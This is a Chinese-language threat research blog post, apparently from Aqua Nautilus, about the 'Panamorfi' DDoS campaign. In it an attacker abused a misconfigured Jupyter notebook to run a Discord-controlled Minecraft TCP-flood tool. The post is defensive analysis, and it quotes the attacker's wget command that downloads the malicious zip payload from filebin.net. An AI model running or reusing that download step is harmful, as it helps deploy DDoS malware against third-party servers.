Aqua Nautilus的研究人员发现了一个新的分布式拒绝服务(DDoS)活动，被命名为“Panamorfi”，通过使用Java编写的minecraft DDoS工具包——mineping——威胁行为者发起了DDoS攻击。到目前为止，我们只看到它通过配置错误的Jupyter笔记本部署。在这篇博客中，我们将解释这次攻击、威胁行为者使用的技术。

攻击流

威胁行为者“yawixooo”获得了我们公开的 Jupyter Notebook 蜜罐的初始访问权限。然后运行以下命令：

wget https://filebin.net/archive/h4fhifnlykw224h9/zip

他们下载了一个随机命名的 zip 文件h4fhifnlykw224h9，这个文件在 Virus Total 上是新文件，ESET 只检测到了 1 个文件。这个 zip 文件 (MD5: 42989a405c8d7c9cb68c323ae9a9a318) 大小约为 17 MB，包含 2 个Jar 文件。

图 1：包含单个检测的 zip 文件

这两个Jar 文件在 VT 中也是新的，并且每个文件仅被 ESET 检测到 1 次。

图 2：包含单个检测的 conn.jar 文件

图 3：包含单个检测的 mineping.jar 文件

连接器 Jar 文件包含初始执行代码。如下图所示，在主要函数中，威胁行为者正在利用 Discord 来控制 DDoS 攻击。受害者的机器正在使用下面指定的凭据连接 Discord 频道。

图4：conn.jar的主要功能

这mineping.jar 是一个已知的 DDoS minecraft 服务器，其代码可在 GitHub 上找到。您可以在代码中看到该mineping.jar 包的加载方式，以便发起 TCP 洪水 DDoS 攻击。此攻击旨在通过发送大量 TCP 连接请求来消耗目标服务器的资源。结果写入 Discord 频道。

图 5：更新 Discord 频道的函数

您还可以看到威胁行为者被标识为“yawixooo”，正在加载签名照片，如下所示。

图 6：Panamorfi DDoS 徽标

mineping.jar 包中包含 12 个 java 文件，这些文件可以加载 http 套接字、使用代理、淹没受害者以及创建随机连接详细信息。

威胁行为者

威胁行为者在代码中将自己标识为“yawixooo”，该代码可在GitHub上找到。在我们调查期间，似乎公共存储库处于活动状态。它包含一个 Minecraft 服务器配置和一个目前正在构建的 HTML 页面。